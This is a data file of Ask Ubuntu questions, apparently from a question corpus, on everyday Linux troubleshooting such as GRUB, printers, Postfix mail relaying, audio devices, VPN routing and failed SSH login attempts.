447681	sudo : ruby : command not found after ssh	i 'm working with ec2 instances and was trying to execute a ruby script on another instance after ssh to that instance . i have a ruby script which updates configuration files , so i need to run that script as super user . when i run the script manually on that instance , sudo ruby recreate-532d01c.rb , the error that comes is sudo : ruby : command not found running simple scripts with no root permissions works , eg.ruby file_1.rb . using rvmsudo in place of sudo executes the script with warning , ubuntu @ ip-10-0-0-111 : ~ $ rvmsudo ruby recreate-82bb000012.rb warning : can not check `/etc/sudoers` for `secure_path` , falling back to call via `/usr/bin/env` , this breaks rules from `/etc/sudoers` . run : export rvmsudo_secure_path=1 to avoid the warning , put it in shell initialization file to make it persistent . in case there is no `secure_path` in `/etc/sudoers` . run : export rvmsudo_secure_path=0 to avoid the warning , put it in shell initialization file to make it persistent . i tried to execute the below command from rails console of one of the instance to test and it fails to recognize ruby as command 1.9.3-p545 :002 > system ( `` ssh -i /home/ubuntu/.ssh/own_key.pem ubuntu @ **.***.*** . ** ruby execute-52d.rb '' ) bash : ruby : command not found i tried with possible solutions over web , but could not resolve the issue . i have the same configuration running for one of my old aws acount , this is a newly created account . not sure if this could be issue in any way as currently ec2 instances fall under vpc by default and have some changes after dec 2013
447682	failure to install a printer in ubuntu 13.10	am having difficulty installing a canon pixma ip4600 printer in 13.10 and can not print a test page . printer performs normally in windows xp . any suggestions please .
447683	intermitent firefox/thunderbird screen problem	ubuntu 13.10 , i7 3970 , 12gb memory , nvidia 650ti driver 331 . sometimes , switching from one workspace to another , firefox or thunderbird fail to render the screen correctly . below , the screen with the problem : and now , the screen without the problem : any idea ? tia !
447684	problem booting from usb stick on old dell laptop	i 'm running ubuntu 8.10 on an old dell latitude laptop and would like to upgrade to ubuntu 13.10 . i was able to make a bootable usb stick but the dell wo n't boot from it . i hit f12 as it booted and got the bios menu but there is no usb option . so i thought about making a cd ( the dell ca n't read dvd ) . i have a desktop running windows 7 that i could make a dvd or cd , but again , the dell wo n't read dvd and the cd does n't have the room for the files . what to do ? my apologies if this has already been answered somewhere - i looked thru many of the answers but did n't see any that answered my dilemma .
447686	how to boot windows 8 from a legacy mbr partition in uefi mode via grub ?	this question is similar to the answer of dual-boot ubuntu 12.10 on uefi along windows 8 ( grub - error : ca n't find command drivemap ) , but windows 8 is installed on a legacy partitioned drive . what steps need to be performed to make the installation boot in uefi mode without converting to gpt or using dism ? i know that it is generally not recommended to mix uefi and legacy booting , but it can be handy in some setups .
447690	how to share ethernet over wifi without creating access point ?	i have company internet with internal ip and proxy settings , i want to share this ethernet connection over wifi , but creating accesspoint is somehow not working may be due to ip architecture , i want to share connection so that if my mobile use it over wifi , the computer thinks as if a browser on the same computer is accessing the internet ( by forwarding or tunneling or something like that ) .
447691	why is libre office unable to retain the original setting/arrangement of microsoft office documents ?	when a microsoft office document is imported to libre office writer , the settings/arrangement of the typed document become distorted/re-arranged . how can i retain the original layout ?
447694	allow optionselector to scroll while expanded	my qml app uses an optionselector to allow users to choose from a list of items . on tablet size , i have it set to keep it expanded . however , i limit the container height , and while it 's expanded , it can not be scrolled . is there a way to let it expand without blocking scrolling ? code : optionselector { id : projectselector property int projectindex : 0 width : pagelayout.width model : projects.count > 0 ? projects : emptylist containerheight : pagelayout.height - itemheight - units.gu ( 3 ) expanded : true }
447696	psad is failing to send emails through mandrill smtp with postfix	i have installed psad on my ubuntu 13 system and i 've set it up to send emails ( i have postfix installed as mail server with a smtp relay to mandrill 's servers ) to some email address , but it seems like what it sends it 's not compliant with mandrill 's filters . this would be an api call that reaches mandrill : { `` from_email '' : null , `` from_name '' : null , `` send_at '' : null , `` async '' : false , `` raw_message '' : `` received : from pulsr.io ( unknown [ 95.85.35.223 ] ) \n\t ( authenticated sender : my_mandrill_api_key @ gmail.com ) \n\tby ip-10-75-135-250 ( postfix ) with esmtpsa id c030e3c0cf4\n\tfor < rolandjitsu @ gmail.com > ; mon , 14 apr 2014 15:10:27 +0000 ( utc ) \nreceived : by pulsr.io ( postfix , from userid 0 ) \n\tid 7e42b61753 ; mon , 14 apr 2014 11:10:27 -0400 ( edt ) \nsubject : [ psad-status ] firewall setup warning on pulsr ! \nto : < rolandjitsu @ gmail.com > \nx-mailer : mail ( gnu mailutils 2.99.98 ) \nmessage-id : < 20140414151027.7e42b61753 @ pulsr.io > \ndate : mon , 14 apr 2014 11:10:27 -0400 ( edt ) \nfrom : root @ pulsr ( root ) \n\n [ - ] you may just need to add a default logging rule to the /sbin/ip6tables\n 'filter ' 'input ' chain on pulsr . for more information , \n see the file \ '' fw_help\ '' in the psad sources directory or visit : \n\n http : //www.cipherdyne.org/psad/docs/fwconfig.html\n '' , `` ip_pool '' : null , `` to '' : [ `` rolandjitsu @ gmail.com '' ] , `` return_path_domain '' : null , `` key '' : `` my_mandrill_api_key '' } and they would respond with : [ { `` email '' : `` rolandjitsu @ gmail.com '' , `` status '' : `` rejected '' , `` _id '' : `` a8c60b80ad3745e48398516bea7ca768 '' , `` reject_reason '' : `` invalid-sender '' } ] it must be something with the raw_message string , since other emails that succeed have the same null values on the properties , but with a different raw_message . an example of working email would be : { `` async '' : false , `` send_at '' : null , `` ip_pool '' : null , `` from_name '' : null , `` to '' : [ `` rolandjitsu @ gmail.com '' ] , `` return_path_domain '' : null , `` raw_message '' : `` received : from pulsr.io ( unknown [ 95.85.35.223 ] ) \n\t ( authenticated sender : my_mandrill_api_key @ gmail.com ) \n\tby ip-10-33-35-82 ( postfix ) with esmtpsa id 894fe2031d\n\tfor < rolandjitsu @ gmail.com > ; mon , 14 apr 2014 12:52:04 +0000 ( utc ) \nreceived : by pulsr.io ( postfix , from userid 0 ) \n\tid 51038608d5 ; mon , 14 apr 2014 08:52:04 -0400 ( edt ) \nfrom : pulsr < root @ pulsr.io > \nsubject : rkhunter\nto : < rolandjitsu @ gmail.com > \nx-mailer : mail ( gnu mailutils 2.99.98 ) \nmessage-id : < 20140414125204.51038608d5 @ pulsr.io > \ndate : mon , 14 apr 2014 08:52:04 -0400 ( edt ) \n\nplease inspect this machine , because it may be infected . `` , `` from_email '' : null , `` key '' : `` my_mandrill_api_key '' } with the response : [ { `` email '' : `` rolandjitsu @ gmail.com '' , `` status '' : `` sent '' , `` _id '' : `` ab8df939be544023a8afb77be5a1e7a8 '' , `` reject_reason '' : null } ] i 've been trying for two days now to figure out what is going on but i have no clue . a little help would be great , if anyone encountered the same issue before ( maybe with google 's smtp as relay ) . edit : my postfix /etc/postfix/main.conf file : # rfc requirement smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) # local user mail notification off biff = yes # appending .domain is the mua 's job . append_dot_mydomain = no readme_directory = no # tls parameters smtpd_tls_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem smtpd_tls_key_file=/etc/ssl/private/ssl-cert-snakeoil.key smtpd_use_tls=yes smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache # see /usr/share/doc/postfix/tls_readme.gz in the postfix-doc package for # information on enabling ssl in the smtp client . smtpd_relay_restrictions = permit_mynetworks permit_sasl_authenticated defer_unauth_destination # hostname myhostname = pulsr.io # domain mydomain = pulsr.io # virtual_alias_maps = hash : /etc/postfix/virtual # virtual_alias_domains = /etc/postfix/vhosts.txt alias_maps = hash : /etc/aliases alias_database = hash : /etc/aliases mydestination = pulsr localhost.pulsr.io localhost mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 mailbox_size_limit = 0 recipient_delimiter = + inet_interfaces = all inet_protocols = all # mandrill relayhost = [ smtp.mandrillapp.com ] smtp_sasl_auth_enable = yes smtp_sasl_password_maps = hash : /etc/postfix/sasl_passwd smtp_sasl_security_options = noanonymous smtp_tls_cafile = /etc/postfix/cacert.pem smtp_use_tls = yes # add missing headers always_add_missing_headers = yes
447697	starting network audio system via its init.d script fails but works when using start-stop-daemon on the command line	i 'm running ubuntu 13.10 ( saucy salamander ) and need the network audio system service ( package nas , version 1.9.3-6 ) which relies on /dev/dsp and /dev/mixer so i installed the oss proxy daemon osspd ( a userland oss emulation ) . osspd starts up fine on boot but nas fails with these 2 lines in the syslog : apr 14 08:52:54 ubuntu nas [ 11697 ] : network audio system release 1.9.3 apr 14 08:52:54 ubuntu nas [ 11698 ] : init : output open ( /dev/dsp ) failed : input/output error trying to bring up nas after boot with service nas start adds the same two lines to the syslog . the weird thing is : on the commandline , running start-stop-daemon -- start -- quiet -- startas /usr/bin/start-nas -- exec /usr/bin/nasd -- -- which is more or less what happens when you run service nas start -- starts the daemon perfectly : apr 14 08:54:34 ubuntu nas [ 11700 ] : network audio system release 1.9.3 apr 14 08:54:34 ubuntu nas [ 11701 ] : init : output open ( /dev/dsp ) failed : no such file or directory , using output device apr 14 08:54:34 ubuntu nas [ 11701 ] : initmixer : could not open input mixer device /dev/mixer1 : no such file or directory apr 14 08:54:34 ubuntu nas [ 11701 ] : initmixer : using output mixer /dev/mixer for input any idea what 's going on ? how can that be ?
447698	installing ubuntu on an ssd	i want to install ubuntu on a laptop with an ssd . will it be a problem in general to install ubuntu on a laptop with an ssd instead of a laptop with an hdd ? which linux kernel version is best for a laptop with an ssd ?
447700	my private folder has become empty	i do n't really know what happened . i just meant to change all the names of the folders in /home so that the first letter of all of them would be lower case . i did it with the command bulkrename of ranger . at that moment it seemed an innocent action . well , it gave me a hell of time , as i changed folders like desktop , documents , and ... private . now the folder private is empty , i presume because it 's some sort of encrypted file system and for some reason is not being mounted any more , but i do n't have a clue as to how to fix it . i may have unadvertendly deleted some key-file . any insight on the issue will be more than welcome . i am using ubuntu 12.04 .
447709	i 'm getting «exec format error» when i try to run an executable	i installed trusty ( daily build ) a couple days ago and , though overall i 'm pleased , i 've run into some problems running some standalone apps ( not installed ) that used to work just fine in 13.10 before the upgrade . for instance , when i tried to run eclipse standard through the launcher , nothing happened . i tried to double click the executable , and nothing happened . when i attempted to run it the terminal , i got : ~ ❯❯❯ '/home/ecc/apps/eclipsestandard/eclipse' zsh : exec format error : /home/joaolopes/apps/eclipsestandard/eclipse this behavior is occuring to other apps , like sublime text 2 and other versions of eclipse . do you have any ideia what 's going on ? edit to add : i 'm using zsh and the file has the necessary perms .
447711	files being destroyed without consent	when i originally posted this , i had not seen any evidence of files being lost on my internal hdd , not since installing ubuntu 13.01 . unfortunately , i was wrong . i keep losing files . years of my life , pictures of loved ones , art and music by myself and my friends . i 'm losing it . it appears to be going after older files first , especially anything with `` back up '' in the title , nested folders , and almost exclusively destroys personal content . i believe the problem was lying dormant for the last couple months . suddenly it 's popped up , and just when i was starting to believe that at least ubuntu linux had helped me saved most of my stuff . i received a new external hdd today . i 'll try to save what i can . original post : my computer is an asus g7vw . while running windows 7 , my files started disappearing and being moved and even copied , without my consent . i did a full install of ubuntu 13.01 ( it gave me the option to preserve my personal files , but otherwise fully format the drive . everything seemed fine and i was able to recover most of my files since ubuntu read my hdd correctly and most of the problem had been in the directory . however , the problem continues to ravage my two external hdds . i have n't found any evidence that it 's messing up the contents of my /home folder , but files and folders on both my external hdds continue to be `` mislocated . '' one of my external drives ( toshiba desktop external drive ) is fairly new ; the other ( seagate freeagent goflex ) is a bit older . i 'm certain that the age of the drive is not a factor in this context . both external drives and the laptop hdd are 1tb drives . neither of the external drives have been damaged physically , or even so much as left in a hot/freezing car . i did only find out a couple months ago that usb is not `` hot-swappable '' but now i always unmount then disconnect the drive . the problem has persisted since i 've wised up . the drive healthsmart util included in ubuntu says all drives are healthy . still , it takes an extremely long time to copy or burn data , from the ubuntu drive or the usb drives ( if that helps ) . i 've recently been trying `rkhunter , clamtk , and comodo to eliminate the possibility of a virus , so far it 's turned up nothing significant . at least i 'm learning a lot about ubuntu linux ... but i hope someone can shed some light on what 's messing with my personal files . update : i found out why clamtk would n't scan the external drives ; it has to run from the terminal via gksu clamtk to select that option . frustratingly , it 's reported well over 300 possible `` threats '' on either hdd , the vast majority of which are not viruses or malware , and since you have to go through them one by one . it 's been very time consuming , but i 'm hoping it will be worth the effort . update & more info : both of the external drives use the ntfs file system , and the internal drive was formatted with the default filesystem used by ubuntu 13.01 ( ext3 ? ) . the external toshiba drive is now reporting `` contents : 207,907 items , totalling 955.0 gb ( some contents unreadable ) '' ... i do n't know why any of it would be unreadable , and that sound about 200gb more than i thought it was holding , but that 's just a guestimate .
447713	ca n't shutdown in 13.10	i have just installed ubuntu 13.10 but my laptop ca n't shutdown . when i try to shutdown it will just keep loading endlessly . after pressing a non-letter key on the keyboard i 'm transferred to a screen which shows a error . when my laptop is showing this error i can still power it off by the on/off button . does anybody know how to fix this ?
447717	i have network problems with kubuntu	i recently installed kubuntu and for some reason its not picking up on my wireless network . im sort of new at this so please try to keep it as simple as possible . thank you in advance .
447718	no sound on usb headset . how to manage soundcards and audio devices ?	i had a fresh reinstall of lubuntu 13.10 and my usb headset seems to be not working . i looked for solutions in some forums , but these did n't work for me . my headset is a genius wire gaming headset . thank you !
447721	how does the installer know what machines are on my network ?	i have a home network with a few linux boxes and a windows xp laptop . i shut down a centos machine , removed the hard drive , installed a new hard drive , and then started a clean install of ubuntu 12.04 . when it came time to set the hostname , i entered the same hostname i 'd been using for this machine , and the installer warned me that there already was a machine with that name on the network . how did it know that ? all of the machines ( except that xp laptop ) have fixed ip addresses , with all of the addresses listed in all of the /etc/hosts files , so there 's never any nameserver lookups for these machines . also on the net is a dsl modem that runs dhcp , and a linksys wireless router configured to just be a wireless access point , no dhcp , and with an ip address that does n't conflict with the dsl modem . it 's also true that the xp laptop has the ip addresses listed in i forget which file , so that it does n't do nameserver lookups for my home machines either , but i do n't think that that laptop was even running when i did the install . the installer was happy to let me insist on using the hostname i wanted , but i 'm really curious to know how this information was available to the installer .
447724	how to set a password on recovery mode in grub	any one can reset the root and other user 's password by going in recovery mode . so i want that on the recovery option grub require a password to enter in recovery mode . but user can login ubuntu without a password requirement . any idea ? i do't want to set grub2 password . i want to set password on recovery mode option or after recovery mode system need a password to go ahead .
447725	question about lynx text browser	when i go to visit this url https : //github.com/search ? q=jquery+stars % 3a > 10+forks % 3a < 10 & type=repositories using this command for lynx : lynx -accept_all_cookies https : //github.com/search ? q=jquery+stars % 3a > 10+forks % 3a < 10 & type=repositories first i get a code like this - > [ 1 ] 4324 then another line which says - > bash : 10 : no such file or directory so , question is how can i browse this url url lynx ? also i can not curl this url , curl also showing nearly like same . i am using ubuntu 12.04 lts
447731	/dev/mapper/cryptswap1 is not ready yet or not present	i get this error whenever i start my lubuntu 13.10 installation : /dev/mapper/cryptswap1 is not ready yet or not present it asks me , if i want to skip , manually repair , or wait . i chose the option ; 'wait ' and i can still login and everything works just fine for me . i have selected to use the option to encrypt my home folder without lvm . is this something i should be concerned about ?
447733	using grub customizer to hide boot menu fails	this is a pretty urgent question . i need to hide the grub2 bootloader ( default is xp and ubuntu 14.10 lts the 2nd option since it 's a dual-boot . ) but no matter however i try to configure it , it fails to hide . can anyone please provide a screenshot of a working grub customizer settings which are guaranteed to hide the grub2 bootloader ? ( i do n't have time to configure grub with gedit ! ) thank you in advance .
447738	usb-creator-gtk does not let me add new isos !	i have got ubuntu 13.10 installed . i wanted to create a bootable usb-stick with ubuntu gnome with the usb-creator . i already had 4 isos loaded into usb-creator but now it does not let me add further isos .
447739	system tray icons not showing	after installing a fresh 14.04 install and then installing google-chrome-unstable ( version 36.0.1933.0 dev aura ) from the google repository , neither the google chrome icon nor the 'google now ' notification bell icon appear on the notification bar . in all my previous installs it would appear as soon as i launched chrome for the first time after installing . i 've naturally tried rebooting , reinstalling and making sure the `` continue running background apps when google chrome is closed '' setting enabled . edit : after installing dropbox i noticed its tray icon is n't showing either , so i figured it was a global issue rather than chrome-specific . eventually found the solution below ( see answer ) .
447742	how do i obtain log info from the installer ?	i have prepared a pxe-preseed-netinstall configuration for a cluster i am setting up . on all nodes , the install process works perfectly . but i have one node for which the installer freeze when installing the base system . i suspect a failure on disk ( it is a hardware raid , in fact ) . is there a way to store the logs of the install ? this could maybe help to understand what is going on on that node ...
447745	in qml , is there a conditional layout that corresponds to the phones orientation ?	so instead of guessing it with something like this : conditionallayout { name : `` column '' when : layouts.width > units.gu ( 50 ) column { ... it would be something like this : conditionallayout { name : `` column '' when : layouts.landscape == true column { ...
447749	 printing pdfs to file but name of file saves with weird box-symbol  with f022 inside	when i print a website to pdf , the file name saves with a weird box-symbol  with f022 inside . anyone know why ? i 'm new to ubuntu , and not sure if this is a problem with my system , maybe i installed something wrong , not sure ... . after googling , i found it toward the middle of this webpage : http : //www.fileformat.info/info/unicode/char/f022/index.htm the following is from the website : string.touppercase ( )  string.tolowercase ( )  someone else posted a similar issue 2years ago on this tread : text inside files has squares with numbers in it but they were getting it due to ocr it sounds like . in anycase hp m ... ...
447750	php does n't work on apache server	i installed lamp sudo tasksel install lamp-server i can run my site , but the php code is just displayed as text . i have tried this solution , but it did n't help me . when i try to run php script with terminal : user @ pc : ~/ooo $ php index.htm i get just php code . when sudo /etc/init.d/apache2 status php -v i get * apache2 is running php 5.5.9-1ubuntu4 ( cli ) ( built : apr 9 2014 17:11:57 ) copyright ( c ) 1997-2014 the php group zend engine v2.5.0 , copyright ( c ) 1998-2014 zend technologies with zend opcache v7.0.3 , copyright ( c ) 1999-2014 , by zend technologies how to solve this ?
447751	why does my computer ( almost ) randomly power off ? ( gpu kernel panics ? )	i 've always had a problem running any sort of linux distro on my machine . i 'm a gamer and tend to spend most of my time in windows and i have never had any issues when it comes to stability of my pc , however my computer will randomly choose to instantly power itself off before powering itself back on moments later . i have experienced this same issue on arch , mint 14 , mint 15 , ubuntu 12.10 , ubuntu 13.04 and ubuntu 14.04 . i 'm not sure what logs i should be looking at to diagnose the problem however i have noticed that running cat /var/log/syslog | grep panic after my computer boots back up shows messages relating to my gpu : apr 14 18:42:58 rob-x58a-ud3r kernel : [ 7.263046 ] radeon 0000:03:00.0 : registered panic notifier weirdly though , i can sometimes replicate the power off by doing certain things , my most recent was an attempt to run sudo apt-get install gparted , which run fine up until it tried to unpackage it , then my computer powers itself off . i 'm hoping somebody could help me get to the bottom of why this keeps happening , even after so trying many revisions of the linux kernel . thanks system specs : mobo : gigabyte ga-x58a-ud3r ( rev . 2.0 ) gpu : radeon hd 7979 ( xserver-xorg-video-ati open sourcedriver ) audio : asus xonar d2x
447752	how to create an image file from customized ubuntu liveusb ?	i 'm using ubuntu 13.10-amd64 on a live persistent usb stick and i want to create an image file ( .iso ) from my customized ubuntu so i can burn it to a dvd later ( i 've already tried partimage , remastersys , relinux , uck , clonezilla , ubuntu builder ... ) . how can i manage to do that ?
447754	amd driver installing on lubuntu 13.10	can someone help with driver installing for this video card ? my video card is sapphire amd radeon hd 3650 . i 'm using lubuntu 13.10 thanks !
447758	saa7115 capture card with video but no sound	i 'm using an empia video card with saa7115 and it works fine for video . however i can not get any audio out of it . when i plug it into the usb i get the following events : [ 15217.788130 ] usb 2-1.2 : new high-speed usb device number 8 using ehci_hcd [ 15217.881031 ] em28xx : new device @ 480 mbps ( eb1a:2861 , interface 0 , class 0 ) [ 15217.881125 ] em28xx # 0 : chip id is em2860 [ 15217.972401 ] em28xx # 0 : board has no eeprom [ 15218.048348 ] em28xx # 0 : found i2c device @ 0x4a [ saa7113h ] [ 15218.086386 ] em28xx # 0 : your board has no unique usb id . [ 15218.086394 ] em28xx # 0 : a hint were successfully done , based on i2c devicelist hash . [ 15218.086399 ] em28xx # 0 : this method is not 100 % failproof . [ 15218.086403 ] em28xx # 0 : if the board were missdetected , please email this log to : [ 15218.086408 ] em28xx # 0 : v4l mailing list < linux-media @ vger.kernel.org > [ 15218.086413 ] em28xx # 0 : board detected as em2860/saa711x reference design [ 15218.163793 ] em28xx # 0 : identified as em2860/saa711x reference design ( card=19 ) [ 15218.163803 ] em28xx # 0 : registering snapshot button ... [ 15218.163996 ] input : em28xx snapshot button as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/input/input17 [ 15218.552567 ] saa7115 15-0025 : saa7113 found ( 1f7113d0e100000 ) @ 0x4a ( em28xx # 0 ) [ 15219.319938 ] em28xx # 0 : config register raw data : 0x10 [ 15219.343855 ] em28xx # 0 : ac97 vendor id = 0x83847652 [ 15219.355871 ] em28xx # 0 : ac97 features = 0x6a90 [ 15219.355879 ] em28xx # 0 : sigmatel audio processor detected ( stac 9752 ) [ 15219.815809 ] em28xx # 0 : v4l2 driver version 0.1.3 [ 15220.839984 ] em28xx # 0 : v4l2 video device registered as video1 [ 15220.839995 ] em28xx # 0 : v4l2 vbi device registered as vbi0 i get it listed in alsa capture devices : coutinho @ coutinhonote : ~/android-sdks/platform-tools $ arecord -l **** list of capture hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : alc269vb analog [ alc269vb analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : lx3000 [ microsoft lifechat lx-3000 ] , device 0 : usb audio [ usb audio ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 2 : u0xeb1a0x2861 [ usb device 0xeb1a:0x2861 ] , device 0 : usb audio [ usb audio ] subdevices : 1/1 subdevice # 0 : subdevice # 0 i see it in sound manager , i change the input gain etc. , however when i try to capture audio i get only silence . here is the line i 'm using : arecord -d hw : card=u0xeb1a0x2861 , dev=0 -c 2 | aplay - any ideas of what is going on ?
447766	error mounting with exit code 1	error mounting : mount exited with exit code 1 : helper failed with : mount : only root can mount /dev/sda5 on /media/bakwas /etc/fstab : static file system information . < file system > < mount point > < type > < options > < dump > < pass > /dev/sda7 /host fuseblk defaults , nosuid , nodev , relatime , user_id=0 , group_id=0 , allow_other , blksize=4096 0 0 /dev/sda6 /media/new_volume ntfs-3g defaults , locale=en_us.utf-8 0 0 /dev/sda1 /media/system ntfs-3g defaults , locale=en_us.utf-8 0 0 /dev/sda5 /media/bakwas ntfs-3g defaults , locale=en_us.utf-8 0 0 /dev/sda2 /media/windows7_64bit ntfs-3g defaults , locale=en_us.utf-8 0 0 /host/ubuntu/disks/swap.disk none swap sw 0 0 above is my fstab file . i am not able to understand how to solve this problem . please help me . i am new in linux when i am restarting system it is showing me all my drives already mounted .
447767	partition setup	i 've been after the crew to update our os to linux for a while . now that they said yes , i 'm having trouble getting started . i have to leave the windows install there . when i go to install , the program asks about partition tables and i 'm kind of out of my league . the drive has plenty of room , it 's not an antique . i 'd like to find something that will walk me through . any suggestions ?
447768	satisfy dependencies on autoremove	based on man apt-get for autoremove we got autoremove is used to remove packages that were automatically installed to satisfy dependencies for some package and that are no more needed . can any one tell me what is satisfy dependencies meaning ? i see this command widly used also in somewhere which we do not instsall any thing . ok what is autoremove realy is and why it used
447770	is there a way to form network connections using shell script ?	i want to form a network connection to a website and read the data line by line and store it in a text file in my system using shell scripting . i have done it using java where i can read using a urlconnection object to that particular resource . in shell scripting is wget spider the only way to do it ? if not what other ways are there to read text file from a website , parse it and store it in my local directory ? edit i tried using wget using wget -o /home/user/desktop/training.txt https : //www.someurl.com . but the output is something like this -- 2014-04-15 00:39:15 -- https : //s3.amazonaws.com/hr-testcases/368/assets/trainingdata.txt resolving s3.amazonaws.com ( s3.amazonaws.com ) ... 176.32.99.154 connecting to s3.amazonaws.com ( s3.amazonaws.com ) |176.32.99.154|:443 ... connected . http request sent , awaiting response ... 200 ok length : 1554016 ( 1.5m ) [ text/plain ] saving to : ‘trainingdata.txt.1’ 0k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 3 % 47.5k 31s 50k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 6 % 129k 20s 100k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 9 % 136k 16s 150k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 13 % 149k 14s 200k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 16 % 1.57m 11s 250k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 19 % 162k 10s 300k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 23 % 678k 9s 350k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 26 % 612k 7s 400k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 29 % 307k 7s 450k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 32 % 630k 6s 500k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 36 % 699k 5s 550k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 39 % 520k 5s 600k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 42 % 580k 4s 650k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 46 % 516k 4s 700k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 49 % 551k 3s 750k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 52 % 713k 3s 800k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 56 % 720k 3s 850k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 59 % 701k 2s 900k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 62 % 603k 2s 950k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 65 % 670k 2s 1000k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 69 % 715k 2s 1050k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 72 % 671k 1s 1100k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 75 % 752k 1s 1150k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 79 % 535k 1s 1200k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 82 % 607k 1s 1250k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 85 % 675k 1s 1300k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 88 % 727k 1s 1350k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 92 % 707k 0s 1400k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 95 % 632k 0s 1450k ... ... ... . ... ... ... . ... ... ... . ... ... ... . ... ... ... . 98 % 785k 0s 1500k ... ... ... . ... ... . 100 % 931k=4.5s 2014-04-15 00:39:23 ( 341 kb/s ) - ‘trainingdata.txt.1’ saved [ 1554016/1554016 ] it only seems to give the statistics like the time taken to download and all . it does not give save the actual data from the url .
447772	how to tell which parameter is being supplied to a command with a redirectioin operator ?	this works : $ echo `` notify-send hello '' | at now this does n't : $ at now < echo `` notify-send hello '' it says 'file or directory not found '' . i understand there 's a -f option to this command , which with which i can supply the file to be executed at a given moment . so this got me thinking ... in general , how do i know for which parameter the redirection operators supply the value ?
447774	windows 8 vpn client connecting to ubuntuvnp server fine but http from client is not working	i have connected my windows client to ubuntu vpn pptp . i am able to access all servers in the private vpn network from my windows client , however when accessing the internet from windows client it resolves internet but unable to connect to any site . the browser shows.. waiting for the site i.e google to reply . the ubuntu server is able to connect to internet by itself . my configurations : netstat -rn : kernel ip routing table destination gateway genmask flags mss window irtt iface 0.0.0.0 172.31.16.1 0.0.0.0 ug 0 0 0 eth0 172.31.16.0 0.0.0.0 255.255.240.0 u 0 0 0 eth0 192.168.0.234 0.0.0.0 255.255.255.255 uh 0 0 0 ppp0 root @ ip-172-31-21-21 : ~ # ifconfig eth0 link encap : ethernet hwaddr 06:14:08:6a:51:39 inet addr:172.31.21.21 bcast:172.31.31.255 mask:255.255.240.0 up broadcast running multicast mtu:1500 metric:1 rx packets:1618 errors:0 dropped:0 overruns:0 frame:0 tx packets:1497 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:327465 ( 327.4 kb ) tx bytes:346070 ( 346.0 kb ) interrupt:25 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 up loopback running mtu:16436 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) ppp0 link encap : point-to-point protocol inet addr:192.168.0.1 p-t-p:192.168.0.234 mask:255.255.255.255 up pointopoint running noarp multicast mtu:1396 metric:1 rx packets:306 errors:0 dropped:0 overruns:0 frame:0 tx packets:401 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:3 rx bytes:26719 ( 26.7 kb ) tx bytes:212361 ( 212.3 kb ) iptables -l -n -v : chain input ( policy accept 1125 packets , 103k bytes ) pkts bytes target prot opt in out source destination chain forward ( policy accept 662 packets , 239k bytes ) pkts bytes target prot opt in out source destination 38 1976 tcpmss tcp -- ppp+ * 0.0.0.0/0 0.0.0.0/0 tcpflags : 0x17/0x02 tcpmss set 1356 chain output ( policy accept 1114 packets , 296k bytes ) pkts bytes target prot opt in out source destination
447777	tens of thousands of failed/denied ssh login attempts	recently a few friends and i came up with an idea for an app . to facilitate the creation of it , we set up lamp on an ubuntu server 12.04 . this box is running from my home . we 've set up 3 user accounts . i 'm still pretty new to linux , but i have a bit of experience from using ubuntu on my own box . today i was playing around with ssh and looking at the logs ( i need to learn how to read that information to know how the server is performing , right ? ) and i saw the strangest thing . in /var/log/auth.log and /var/log/auth.log.1 i saw a bunch of failed login attempts for 'root ' and a few usernames i 'm not familiar with . i looked over them and for as far as i can see no user has been authenticated except for the actual users on the system . a lot of the ip-addresses listed seem to be from russia . as of now this server contains nothing but a vanilla ubuntu server with lamp , but even so , with the following command : sudo grep -i fail /var/log/auth.log | wc -l i get 3412 as a result . this seems very excessive for a server that has been up since april 8th . it gets worse , because running the above command on auth.log.1 returns 23075 ( ! ! ! ! ) results . it seems obvious that people are trying to break into the server . 